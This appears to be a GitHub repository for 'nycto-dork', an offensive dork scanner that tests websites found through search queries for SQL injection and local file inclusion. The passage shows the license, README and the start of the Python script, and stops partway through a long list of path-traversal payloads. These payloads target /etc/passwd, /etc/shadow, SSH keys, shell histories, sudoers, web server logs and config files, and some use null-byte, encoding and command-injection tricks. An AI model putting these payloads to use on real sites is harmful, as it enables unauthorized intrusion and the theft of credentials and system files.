├── LICENSE ├── README.md ├── _config.yml └── nyctodork.py /LICENSE: -------------------------------------------------------------------------------- 1 | +MIT License 2 | + 3 | +Copyright (c) 2017 Argoles nycto-hackerone 4 | + 5 | +Permission is hereby granted, free of charge, to any person obtaining a copy 6 | +of this software and associated documentation files (the "Software"), to deal 7 | +in the Software without restriction, including without limitation the rights 8 | +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | +copies of the Software, and to permit persons to whom the Software is 10 | +furnished to do so, subject to the following conditions: 11 | + 12 | +The above copyright notice and this permission notice shall be included in all 13 | +copies or substantial portions of the Software. 14 | + 15 | +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | +SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # nycto-dork 2 | dork scanner with Sqli and Lfi testing 3 | 4 | go to saved file and grant permissions 5 | 6 | cd "where ever you saved file" 7 | 8 | ./nyctodork.py to run script 9 | 10 | ![screenshot from 2017-11-25 19-17-49](https://user-images.githubusercontent.com/31374857/33233916-db61f88a-d215-11e7-817c-9aeef6c7d5ad.png) 11 | ![screenshot from 2017-11-25 19-18-32](https://user-images.githubusercontent.com/31374857/33233917-db963924-d215-11e7-9052-b66d958eddb1.png) 12 | ![screenshot from 2017-11-25 19-19-38](https://user-images.githubusercontent.com/31374857/33233918-dca2c36e-d215-11e7-9a7b-4697295953e7.png) 13 | 14 | still has issues with crashing sometimes, I hope to get that fixed soon 15 | 16 | 17 | -------------------------------------------------------------------------------- /_config.yml: -------------------------------------------------------------------------------- 1 | theme: jekyll-theme-hacker -------------------------------------------------------------------------------- /nyctodork.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # This was written for educational purpose and pentest only. Use it at your own risk. 3 | # Author will be not responsible for any damage! 4 | # 5 | # Toolname : nycto.py 6 | # Coder : NYCTO 7 | # Re-written by : ^^^^^^^^ 8 | # Version : 0.5 9 | # 10 | 11 | import string, sys, time, urllib2, cookielib, re, random, threading, socket, os, subprocess 12 | from random import choice 13 | 14 | # Colours 15 | W = "\033[0m"; 16 | R = "\033[31m"; 17 | G = "\033[32m"; 18 | O = "\033[33m"; 19 | B = "\033[34m"; 20 | 21 | 22 | # Banner 23 | def logo(): 24 | print G+"\n " 25 | 26 | print "███╗ ██╗██╗ ██╗ ██████╗████████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗ " 27 | print "████╗ ██║╚██╗ ██╔╝██╔════╝╚══██╔══╝██╔═══██╗ ██╔══██╗██╔═══██╗██╔══██╗██║ ██╔╝ " 28 | print "██╔██╗ ██║ ╚████╔╝ ██║ ██║ ██║ ██║█████╗██║ ██║██║ ██║██████╔╝█████╔╝ " 29 | print "██║╚██╗██║ ╚██╔╝ ██║ ██║ ██║ ██║╚════╝██║ ██║██║ ██║██╔══██╗██╔═██╗ " 30 | print "██║ ╚████║ ██║ ╚██████╗ ██║ ╚██████╔╝ ██████╔╝╚██████╔╝██║ ██║██║ ██╗ " 31 | print "╚═╝ ╚═══╝ ╚═╝ ╚═════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ " 32 | print " A World Designed By Technology Is A World Designed To Be Broken..! " 33 | print " Written By Nycto " 34 | print " Nycto - Dork - Scanner " 35 | print "====================================================================================\n" 36 | print G 37 | 38 | if sys.platform == 'linux' or sys.platform == 'linux2': 39 | subprocess.call("clear", shell=True) 40 | logo() 41 | 42 | else: 43 | subprocess.call("cls", shell=True) 44 | logo() 45 | 46 | log = "Nycto-check.txt" 47 | logfile = open(log, "a") 48 | lfi_log = "Nycto-dOrk-lfi.txt" 49 | lfi_log_file = open(lfi_log, "a") 50 | threads = [] 51 | finallist = [] 52 | vuln = [] 53 | timeout = 350 54 | socket.setdefaulttimeout(timeout) 55 | 56 | 57 | 58 | 59 | lfis = ["/etc/passwd%00", 60 | "../etc/passwd%00", 61 | "../../etc/passwd%00", 62 | "../../../etc/passwd%00", 63 | "../../../../etc/passwd%00", 64 | "../../../../../etc/passwd%00", 65 | "../../../../../../etc/passwd%00", 66 | "../../../../../../../etc/passwd%00", 67 | "../../../../../../../../etc/passwd%00", 68 | "../../../../../../../../../etc/passwd%00", 69 | "../../../../../../../../../../etc/passwd%00", 70 | "../../../../../../../../../../../etc/passwd%00", 71 | "../../../../../../../../../../../../etc/passwd%00", 72 | "../../../../../../../../../../../../../etc/passwd%00", 73 | "/etc/passwd", 74 | "../etc/passwd", 75 | "../../etc/passwd", 76 | "../../../etc/passwd", 77 | "../../../../etc/passwd", 78 | "../../../../../etc/passwd", 79 | "../../../../../../etc/passwd", 80 | "../../../../../../../etc/passwd", 81 | "../../../../../../../../etc/passwd", 82 | "../../../../../../../../../etc/passwd", 83 | "../../../../../../../../../../etc/passwd", 84 | "../../../../../../../../../../../etc/passwd", 85 | "../../../../../../../../../../../../etc/passwd", 86 | "../../../../../../../../../../../../../etc/passwd""%00../../../../../../etc/passwd", 87 | "%00../../../../../../etc/shadow", 88 | "%00/etc/passwd%00", 89 | "%00/etc/shadow%00", 90 | "%0a/bin/cat%20/etc/passwd", 91 | "%0a/bin/cat%20/etc/shadow", 92 | "%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini", 93 | "%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00", 94 | "%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00", 95 | "..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini", 96 | "../../../../../../../../../../../../boot.ini", 97 | "../../../../../../../../../../../../boot.ini%00", 98 | "../../../../../../../../../../../../etc/hosts", 99 | "../../../../../../../../../../../../etc/hosts%00", 100 | "../../../../../../../../../../../../etc/passwd", 101 | "../../../../../../../../../../../../etc/passwd%00", 102 | "../../../../../../../../../../../../etc/shadow", 103 | "../../../../../../../../../../../../etc/shadow%00", 104 | "../../../../../../../../../../../../localstart.asp", 105 | "../../../../../../../../../../../../localstart.asp%00", 106 | "../../../../../../../../conf/server.xml", 107 | "../../../../../apache/logs/access.log", 108 | "../../../../../apache/logs/error.log", 109 | "../../../../../etc/httpd/logs/access.log", 110 | "../../../../../etc/httpd/logs/access_log", 111 | "../../../../../etc/httpd/logs/error.log", 112 | "../../../../../etc/httpd/logs/error_log", 113 | "../../../../../logs/access.log", 114 | "../../../../../logs/error.log", 115 | "../../../../../usr/local/apache/logs/access.log", 116 | "../../../../../usr/local/apache/logs/access_log", 117 | "../../../../../usr/local/apache/logs/error.log", 118 | "../../../../../usr/local/apache/logs/error_log", 119 | "../../../../../var/log/access_log", 120 | "../../../../../var/log/apache/access.log", 121 | "../../../../../var/log/apache/access_log", 122 | "../../../../../var/log/apache/error.log", 123 | "../../../../../var/log/apache/error_log", 124 | "../../../../../var/log/error_log", 125 | "../../../../../var/log/httpd/access_log", 126 | "../../../../../var/log/httpd/error_log", 127 | "../../../../../var/www/logs/access.log", 128 | "../../../../../var/www/logs/error.log", 129 | "../../../../../var/www/logs/error_log", 130 | "../../../../apache/logs/access.log", 131 | "../../../../apache/logs/error.log", 132 | "../../../../logs/access.log", 133 | "../../../../logs/error.log", 134 | "../../../apache/logs/access.log", 135 | "../../../apache/logs/error.log", 136 | "../../../logs/access.log", 137 | "../../../logs/error.log", 138 | "../../apache/logs/access.log", 139 | "../../apache/logs/error.log", 140 | "../../boot.ini", 141 | "../../logs/access.log", 142 | "../../logs/error.log", 143 | "../apache/logs/access.log", 144 | "../apache/logs/error.log", 145 | "../logs/access.log", 146 | "../logs/error.log", 147 | "..\..\..\..\..\..\..\..\..\..boot.ini", 148 | "..\..\..\..\..\..\..\..\..\..boot.ini%00", 149 | "..\..\..\..\..\..\..\..\..\..\etc\passwd", 150 | "..\..\..\..\..\..\..\..\..\..\etc\passwd%00", 151 | "..\..\..\..\..\..\..\..\..\..\etc\shadow", 152 | "..\..\..\..\..\..\..\..\..\..\etc\shadow%00", 153 | ".\./.\./../.\./../.\./etc/passwd", 154 | ".\./.\/.\./.\./../../etc/shadow", 155 | "/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00", 156 | "/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini", 157 | "/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini", 158 | "/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd", 159 | "/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow", 160 | "/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd", 161 | "/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow", 162 | "/.../.../.../.../.../", 163 | "/../../../../../../../../%2A", 164 | "/../../../../../../../../../../../boot.ini", 165 | "/../../../../../../../../../../../boot.ini%00", 166 | "/../../../../../../../../../../../boot.ini%00.html", 167 | "/../../../../../../../../../../../boot.ini%00.jpg", 168 | "/../../../../../../../../../../../etc/passwd%00.html", 169 | "/../../../../../../../../../../../etc/passwd%00.jpg", 170 | "/../../../../../../../../../../etc/passwd", 171 | "/../../../../../../../../../../etc/passwd^^", 172 | "/../../../../../../../../../../etc/shadow", 173 | "/../../../../../../../../../../etc/shadow^^", 174 | "/../../../../../../../../bin/id|", 175 | "/../../var/www/logs/access_log", 176 | "/..\../..\../..\../..\../..\../..\../boot.ini", 177 | "/..\../..\../..\../..\../..\../..\../etc/passwd", 178 | "/..\../..\../..\../..\../..\../..\../etc/shadow", 179 | "/./././././././././././boot.ini", 180 | "/./././././././././././etc/passwd", 181 | "/./././././././././././etc/shadow", 182 | "/.\./../.\./.\./.\./.\./boot.ini", 183 | "/NetServer/bin\stable/apache\php.ini", 184 | "/PHP\php.ini", 185 | "/Program Files\Apache Group\Apache2\conf\httpd.conf", 186 | "/Program Files\Apache Group\Apache\conf\httpd.conf", 187 | "/Program Files\Apache Group\Apache\logs/access.log", 188 | "/Program Files\Apache Group\Apache\logs\error.log", 189 | "/Program Files/xampp/apache\conf\httpd.conf", 190 | "/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf", 191 | "/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf", 192 | "/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf", 193 | "/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php", 194 | "/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini", 195 | "/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php", 196 | "/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php", 197 | "/Volumes/webBackup/opt/apache2/conf/httpd.conf", 198 | "/Volumes/webBackup/private/etc/httpd/httpd.conf", 199 | "/Volumes/webBackup/private/etc/httpd/httpd.conf.default", 200 | "/WINDOWS\php.ini", 201 | "/WINNT\php.ini", 202 | "/apache/logs/access.log", 203 | "/apache/logs/error.log", 204 | "/apache2/logs/access.log", 205 | "/apache2/logs/error.log", 206 | "/apache\php\php.ini", 207 | "/bin/php.ini", 208 | "/etc/apache/apache.conf", 209 | "/etc/apache/conf/httpd.conf", 210 | "/etc/apache/httpd.conf", 211 | "/etc/apache2/apache2.conf", 212 | "/etc/apache2/conf/httpd.conf", 213 | "/etc/apache2/httpd.conf", 214 | "/etc/apache2/sites-available/default", 215 | "/etc/apache2/vhosts.d/default_vhost.include", 216 | "/etc/chrootUsers", 217 | "/etc/ftpchroot", 218 | "/etc/ftphosts", 219 | "/etc/group", 220 | "/etc/http/conf/httpd.conf", 221 | "/etc/http/httpd.conf", 222 | "/etc/httpd.conf", 223 | "/etc/httpd/conf/httpd.conf", 224 | "/etc/httpd/httpd.conf", 225 | "/etc/httpd/logs/acces.log", 226 | "/etc/httpd/logs/acces_log", 227 | "/etc/httpd/logs/access.log", 228 | "/etc/httpd/logs/access_log", 229 | "/etc/httpd/logs/error.log", 230 | "/etc/httpd/logs/error_log", 231 | "/etc/httpd/php.ini", 232 | "/etc/init.d/apache", 233 | "/etc/init.d/apache2", 234 | "/etc/logrotate.d/ftp", 235 | "/etc/logrotate.d/proftpd", 236 | "/etc/logrotate.d/vsftpd.log", 237 | "/etc/mail/access", 238 | "/etc/my.cnf", 239 | "/etc/mysql/my.cnf", 240 | "/etc/php.ini", 241 | "/etc/php/apache/php.ini", 242 | "/etc/php/apache2/php.ini", 243 | "/etc/php/cgi/php.ini", 244 | "/etc/php/php.ini", 245 | "/etc/php/php4/php.ini", 246 | "/etc/php4.4/fcgi/php.ini", 247 | "/etc/php4/apache/php.ini", 248 | "/etc/php4/apache2/php.ini", 249 | "/etc/php4/cgi/php.ini", 250 | "/etc/php5/apache/php.ini", 251 | "/etc/php5/apache2/php.ini", 252 | "/etc/php5/cgi/php.ini", 253 | "/etc/proftp.conf", 254 | "/etc/proftpd/modules.conf", 255 | "/etc/protpd/proftpd.conf", 256 | "/etc/pure-ftpd.conf", 257 | "/etc/pure-ftpd/pure-ftpd.conf", 258 | "/etc/pure-ftpd/pure-ftpd.pdb", 259 | "/etc/pure-ftpd/pureftpd.pdb", 260 | "/etc/pureftpd.passwd", 261 | "/etc/pureftpd.pdb", 262 | "/etc/security/environ", 263 | "/etc/security/failedlogin", 264 | "/etc/security/group", 265 | "/etc/security/lastlog", 266 | "/etc/security/limits", 267 | "/etc/security/passwd", 268 | "/etc/security/user", 269 | "/etc/shadow", 270 | "/etc/utmp", 271 | "/etc/vhcs2/proftpd/proftpd.conf", 272 | "/etc/vsftpd.chroot_list", 273 | "/etc/vsftpd.conf", 274 | "/etc/vsftpd/vsftpd.conf", 275 | "/etc/wtmp", 276 | "/etc/wu-ftpd/ftpaccess", 277 | "/etc/wu-ftpd/ftphosts", 278 | "/etc/wu-ftpd/ftpusers", 279 | "/home/apache/conf/httpd.conf", 280 | "/home/apache/httpd.conf", 281 | "/home2/bin\stable/apache\php.ini", 282 | "/home/bin\stable/apache\php.ini", 283 | "/logs/access.log", 284 | "/logs/error.log", 285 | "/logs/pure-ftpd.log", 286 | "/opt/apache/conf/httpd.conf", 287 | "/opt/apache2/conf/httpd.conf", 288 | "/opt/lampp/logs/access.log", 289 | "/opt/lampp/logs/access_log", 290 | "/opt/lampp/logs/error.log", 291 | "/opt/lampp/logs/error_log", 292 | "/opt/xampp/etc/php.ini", 293 | "/opt/xampp/logs/access.log", 294 | "/opt/xampp/logs/access_log", 295 | "/opt/xampp/logs/error.log", 296 | "/opt/xampp/logs/error_log", 297 | "/php4\php.ini", 298 | "/php5\php.ini", 299 | "/php\php.ini", 300 | "/private/etc/httpd/httpd.conf", 301 | "/private/etc/httpd/httpd.conf.default", 302 | "/proc/self/cmdline", 303 | "/proc/self/envron", 304 | "/root/.Xauthority", 305 | "/root/.bash_history", 306 | "/root/.bash_logut", 307 | "/root/.ksh_history", 308 | "/usr/apache/conf/httpd.conf", 309 | "/usr/apache2/conf/httpd.conf", 310 | "/usr/etc/pure-ftpd.conf", 311 | "/usr/lib/cron/log", 312 | "/usr/lib/php.ini", 313 | "/usr/lib/php/php.ini", 314 | "/usr/lib/security/mkuser.default", 315 | "/usr/local/Zend/etc/php.ini", 316 | "/usr/local/apache/conf/httpd.conf", 317 | "/usr/local/apache/conf/php.ini", 318 | "/usr/local/apache/httpd.conf", 319 | "/usr/local/apache/log", 320 | "/usr/local/apache/logs", 321 | "/usr/local/apache/logs/access. log", 322 | "/usr/local/apache/logs/access.log", 323 | "/usr/local/apache/logs/access_ log", 324 | "/usr/local/apache/logs/access_log", 325 | "/usr/local/apache/logs/error.log", 326 | "/usr/local/apache/logs/error_log", 327 | "/usr/local/apache2/conf/httpd.conf", 328 | "/usr/local/apache2/httpd.conf", 329 | "/usr/local/apache2/logs/access.log", 330 | "/usr/local/apache2/logs/access_log", 331 | "/usr/local/apache2/logs/error.log", 332 | "/usr/local/apache2/logs/error_log", 333 | "/usr/local/apps/apache/conf/httpd.conf", 334 | "/usr/local/apps/apache2/conf/httpd.conf", 335 | "/usr/local/cpanel/logs", 336 | "/usr/local/cpanel/logs/access_log", 337 | "/usr/local/cpanel/logs/error_log", 338 | "/usr/local/cpanel/logs/license_log", 339 | "/usr/local/cpanel/logs/login_log", 340 | "/usr/local/cpanel/logs/stats_log" 341 | "/usr/local/etc/apache/conf/httpd.conf", 342 | "/usr/local/etc/apache/vhosts.conf", 343 | "/usr/local/etc/apache2/conf/httpd.conf", 344 | "/usr/local/etc/httpd/conf/httpd.conf", 345 | "/usr/local/etc/httpd/logs/access_log", 346 | "/usr/local/etc/httpd/logs/error_log", 347 | "/usr/local/etc/php.ini", 348 | "/usr/local/etc/pure-ftpd.conf", 349 | "/usr/local/etc/pureftpd.pdb", 350 | "/usr/local/httpd/conf/httpd.conf", 351 | "/usr/local/lib/php.ini", 352 | "/usr/local/php/httpd.conf", 353 | "/usr/local/php/httpd.conf.php", 354 | "/usr/local/php/lib/php.ini", 355 | "/usr/local/php4/httpd.conf", 356 | "/usr/local/php4/httpd.conf.php", 357 | "/usr/local/php4/lib/php.ini", 358 | "/usr/local/php5/httpd.conf", 359 | "/usr/local/php5/httpd.conf.php", 360 | "/usr/local/php5/lib/php.ini", 361 | "/usr/local/pureftpd/etc/pure-ftpd.conf", 362 | "/usr/local/pureftpd/etc/pureftpd.pdb", 363 | "/usr/local/pureftpd/sbin/pure-config.pl", 364 | "/usr/local/www/logs/thttpd_log", 365 | "/usr/pkgsrc/net/pureftpd/", 366 | "/usr/ports/contrib/pure-ftpd/", 367 | "/usr/ports/ftp/pure-ftpd/", 368 | "/usr/ports/net/pure-ftpd/", 369 | "/usr/sbin/pure-config.pl", 370 | "/usr/spool/lp/log", 371 | "/usr/spool/mqueue/syslog", 372 | "/var/adm", 373 | "/var/adm/SYSLOG", 374 | "/var/adm/X0msgs", 375 | "/var/adm/acct/sum/loginlog", 376 | "/var/adm/aculog", 377 | "/var/adm/aculogs", 378 | "/var/adm/crash/unix", 379 | "/var/adm/crash/vmcore", 380 | "/var/adm/cron/log", 381 | "/var/adm/dtmp", 382 | "/var/adm/lastlog/username", 383 | "/var/adm/log/asppp.log", 384 | "/var/adm/log/xferlog", 385 | "/var/adm/loginlog", 386 | "/var/adm/lp/lpd-errs", 387 | "/var/adm/messages", 388 | "/var/adm/pacct", 389 | "/var/adm/qacct", 390 | "/var/adm/ras/bootlog", 391 | "/var/adm/ras/errlog", 392 | "/var/adm/sulog", 393 | "/var/adm/utmp", 394 | "/var/adm/utmpx", 395 | "/var/adm/vold.log", 396 | "/var/adm/wtmp", 397 | "/var/adm/wtmpx", 398 | "/var/apache/log", 399 | "/var/apache/logs", 400 | "/var/apache/logs/access_log", 401 | "/var/apache/logs/error_log", 402 | "/var/cpanel/cpanel.config", 403 | "/var/cron/log", 404 | "/var/lib/mysql/my.cnf", 405 | "/var/local/www/conf/php.ini", 406 | "/var/lock/samba", 407 | "/var/log", 408 | "/var/log/POPlog", 409 | "/var/log/access.log", 410 | "/var/log/access_log", 411 | "/var/log/acct", 412 | "/var/log/apache-ssl/access.log", 413 | "/var/log/apache-ssl/error.log", 414 | "/var/log/apache/access.log", 415 | "/var/log/apache/access_log", 416 | "/var/log/apache/error.log", 417 | "/var/log/apache/error_log", 418 | "/var/log/apache2/access.log", 419 | "/var/log/apache2/access_log", 420 | "/var/log/apache2/error.log", 421 | "/var/log/apache2/error_log", 422 | "/var/log/auth", 423 | "/var/log/auth.log", 424 | "/var/log/authlog", 425 | "/var/log/boot.log", 426 | "/var/log/cron.log", 427 | "/var/log/error.log", 428 | "/var/log/error_log", 429 | "/var/log/exim/mainlog", 430 | "/var/log/exim/paniclog", 431 | "/var/log/exim/rejectlog", 432 | "/var/log/exim_mainlog", 433 | "/var/log/exim_paniclog", 434 | "/var/log/exim_rejectlog", 435 | "/var/log/ftp-proxy", 436 | "/var/log/ftp-proxy/ftp-proxy.log", 437 | "/var/log/ftplog", 438 | "/var/log/httpd/", 439 | "/var/log/httpd/access.log", 440 | "/var/log/httpd/access_log", 441 | "/var/log/httpd/error.log", 442 | "/var/log/httpd/error_log", 443 | "/var/log/httpsd/ssl.access_log", 444 | "/var/log/httpsd/ssl_log", 445 | "/var/log/kern.log", 446 | "/var/log/lastlog", 447 | "/var/log/lighttpd", 448 | "/var/log/maillog", 449 | "/var/log/message", 450 | "/var/log/messages", 451 | "/var/log/mysql.log", 452 | "/var/log/mysql/mysql-bin.log", 453 | "/var/log/mysql/mysql-slow.log", 454 | "/var/log/mysql/mysql.log", 455 | "/var/log/mysqld.log", 456 | "/var/log/mysqlderror.log", 457 | "/var/log/ncftpd.errs", 458 | "/var/log/ncftpd/misclog.txt", 459 | "/var/log/news", 460 | "/var/log/news.all", 461 | "/var/log/news/news", 462 | "/var/log/news/news.all", 463 | "/var/log/news/news.crit", 464 | "/var/log/news/news.err", 465 | "/var/log/news/news.notice", 466 | "/var/log/news/suck.err", 467 | "/var/log/news/suck.notice", 468 | "/var/log/poplog", 469 | "/var/log/proftpd", 470 | "/var/log/proftpd.access_log", 471 | "/var/log/proftpd.xferlog", 472 | "/var/log/proftpd/xferlog.legacy", 473 | "/var/log/pure-ftpd/pure-ftpd.log", 474 | "/var/log/pureftpd.log", 475 | "/var/log/qmail", 476 | "/var/log/qmail/", 477 | "/var/log/samba", 478 | "/var/log/samba-log.%m", 479 | "/var/log/secure", 480 | "/var/log/smtpd", 481 | "/var/log/spooler", 482 | "/var/log/syslog", 483 | "/var/log/telnetd", 484 | "/var/log/thttpd_log", 485 | "/var/log/utmp", 486 | "/var/log/vsftpd.log", 487 | "/var/log/wtmp", 488 | "/var/log/xferlog", 489 | "/var/log/yum.log", 490 | "/var/lp/logs/lpNet", 491 | "/var/lp/logs/lpsched", 492 | "/var/lp/logs/requests", 493 | "/var/mysql.log", 494 | "/var/run/utmp", 495 | "/var/saf/_log", 496 | "/var/saf/port/log", 497 | "/var/spool/errors", 498 | "/var/spool/locks", 499 | "/var/spool/logs", 500 | "/var/spool/tmp", 501 | "/var/www/conf/httpd.conf", 502 | "/var/www/html/.htaccess", 503 | "/var/www/localhost/htdocs/.htaccess", 504 | "/var/www/log/access_log", 505 | "/var/www/log/error_log", 506 | "/var/www/logs/access.log", 507 | "/var/www/logs/access_log", 508 | "/var/www/logs/error.log", 509 | "/var/www/logs/error_log", 510 | "/var/www/sitename/htdocs/", 511 | "/var/www/vhosts/sitename/httpdocs/.htaccess", 512 | "/var/www/web1/html/.htaccess", 513 | "/web/conf/php.ini", 514 | "/www/logs/proftpd.system.log", 515 | "/xampp\apache\bin\php.ini", 516 | "C:/boot.ini", 517 | "C:/inetpub/wwwroot/global.asa", 518 | "C:\boot.ini", 519 | "C:\inetpub\wwwroot\global.asa", 520 | "\..\..\..\..\..\..\..\..\..\..\boot.ini", 521 | "\..\..\..\..\..\..\..\..\..\..\etc\passwd", 522 | "\..\..\..\..\..\..\..\..\..\..\etc\passwd%00", 523 | "\..\..\..\..\..\..\..\..\..\..\etc\shadow", 524 | "\..\..\..\..\..\..\..\..\..\..\etc\shadow%00", 525 | "\\'/bin/cat%20/etc/passwd\\'", 526 | "\\'/bin/cat%20/etc/shadow\\'", 527 | "c:\Program Files\Apache Group\Apache\logs\access.log", 528 | "c:\Program Files\Apache Group\Apache\logs\error.log", 529 | "c:\System32\Inetsrv\metabase.xml", 530 | "c:\apache\logs\access.log", 531 | "c:\apache\logs\error.log", 532 | "c:\inetpub\wwwroot\index.asp", 533 | "d:\System32\Inetsrv\metabase.xml", 534 | "/var/log/mysqld.log", 535 | "/etc/passwd", 536 | "/etc/shadow", 537 | "/etc/hosts", 538 | "/etc/hosts.allow", 539 | "/etc/hosts.equiv", 540 | "/etc/hosts.deny", 541 | "/etc/ssh/sshd_config", 542 | "/etc/apache/httpd.conf", 543 | "/etc/resolv.conf", 544 | "/var/log/message", 545 | "/etc/inetd.conf", 546 | "/etc/crontab", 547 | "/etc/defaultdomain", 548 | "/etc/rpc", 549 | "/.rhosts", 550 | "/.shosts", 551 | "/.ssh/authorized_keys", 552 | "/.bash_history", 553 | "/.bash_profile", 554 | "/.sh_history", 555 | "/.profile", 556 | "/.bashrc", 557 | "/.logout", 558 | "/.Xauthority", 559 | "/.netrc", 560 | "/.cshrc", 561 | "/etc/hostname.hme0", 562 | "/etc/hostname.pcn0", 563 | "/etc/hostname.iprb0", 564 | "/etc/hostname.qfe0", 565 | "/etc/hostname.eri0", 566 | "/etc/hostname.bge", 567 | "/etc/hostname.ce0", 568 | "/etc/hostname.dmfe0", 569 | "/etc/hostname.dnet0", 570 | "/etc/hostname.elx0", 571 | "/etc/hostname.elxl0", 572 | "/etc/hostname.spwr0", 573 | "/etc/hostname.eri0", 574 | "/etc/hostname.ge0", 575 | "/etc/hostname.ieef0", 576 | "/etc/hostname.le0", 577 | "/etc/hostname.dcelx0", 578 | "/etc/hostname.ecn0", 579 | "/etc/hostname.lo", 580 | "/etc/hostname.hme1", 581 | "/etc/hostname.pcn1", 582 | "/etc/hostname.iprb1", 583 | "/etc/hostname.qfe1", 584 | "/etc/hostname.eri1", 585 | "/etc/hostname.bge", 586 | "/etc/hostname.ce1", 587 | "/etc/hostname.dmfe1", 588 | "/etc/hostname.dnet1", 589 | "/etc/hostname.elx1", 590 | "/etc/hostname.elxl1", 591 | "/etc/hostname.spwr1", 592 | "/etc/hostname.eri1", 593 | "/etc/hostname.ge1", 594 | "/etc/hostname.ieef1", 595 | "/etc/hostname.le1", 596 | "/etc/hostname.dcelx1", 597 | "/etc/hostname.ecn1", 598 | "/etc/hostname.lo", 599 | "/etc/hostname.hme2", 600 | "/etc/hostname.pcn2", 601 | "/etc/hostname.iprb2", 602 | "/etc/hostname.qfe2", 603 | "/etc/hostname.eri2", 604 | "/etc/hostname.bge", 605 | "/etc/hostname.ce2", 606 | "/etc/hostname.dmfe2", 607 | "/etc/hostname.dnet2", 608 | "/etc/hostname.elx2", 609 | "/etc/hostname.elxl2", 610 | "/etc/hostname.spwr2", 611 | "/etc/hostname.eri2", 612 | "/etc/hostname.ge2", 613 | "/etc/hostname.ieef2", 614 | "/etc/hostname.le2", 615 | "/etc/hostname.dcelx2", 616 | "/etc/hostname.ecn2", 617 | "/etc/hostname.lo", 618 | "/etc/hostname.hme3", 619 | "/etc/hostname.pcn3", 620 | "/etc/hostname.iprb3", 621 | "/etc/hostname.qfe3", 622 | "/etc/hostname.eri3", 623 | "/etc/hostname.bge", 624 | "/etc/hostname.ce3", 625 | "/etc/hostname.dmfe3", 626 | "/etc/hostname.dnet3", 627 | "/etc/hostname.elx3", 628 | "/etc/hostname.elxl3", 629 | "/etc/hostname.spwr3", 630 | "/etc/hostname.eri3", 631 | "/etc/hostname.ge3", 632 | "/etc/hostname.ieef3", 633 | "/etc/hostname.le3", 634 | "/etc/hostname.dcelx3", 635 | "/etc/hostname.ecn3", 636 | "/etc/hostname.lo", 637 | "/etc/default/passwd", 638 | "/etc/syslog.conf", 639 | "/etc/syslogd.conf", 640 | "/etc/release", 641 | "/etc/motd", 642 | "/etc/issue", 643 | "/etc/group", 644 | "/etc/nsswitch.conf", 645 | "/etc/opt/ipf/ipf.conf", 646 | "/etc/opt/ipf/ipnat.conf", 647 | "/etc/vfstab", 648 | "/etc/system", 649 | "/etc/defaultrouter", 650 | "/var/adm/messages", 651 | "/var/log/syslog", 652 | "/var/adm/utmpx", 653 | "/var/adm/loginlog", 654 | "/var/adm/lastlog", 655 | "/etc/netconfig", 656 | "/var/log/authlog", 657 | "/log/miscDir/accesslog", 658 | "/etc/sudoers", 659 | "/etc/httpd/conf/httpd.conf", 660 | "/etc/make.conf", 661 | "/etc/apt/sources.list", 662 | "/etc/passwd", 663 | "/etc/shadow", 664 | "/etc/hosts", 665 | "/etc/hosts.allow", 666 | "/etc/hosts.equiv", 667 | "/etc/hosts.deny", 668 | "/etc/ssh/sshd_config", 669 | "/etc/apache/httpd.conf", 670 | "/etc/resolv.conf", 671 | "/var/log/messages", 672 | "/var/log/dmesg", 673 | "/etc/inetd.conf", 674 | "/etc/crontab", 675 | "/etc/defaultdomain", 676 | "/etc/rpc", 677 | "/.rhosts", 678 | "/.shosts", 679 | "/.ssh/authorized_keys", 680 | "/.bash_history", 681 | "/.bash_profile", 682 | "/.sh_history", 683 | "/.profile", 684 | "/.bashrc", 685 | "/.logout", 686 | "/.Xauthority", 687 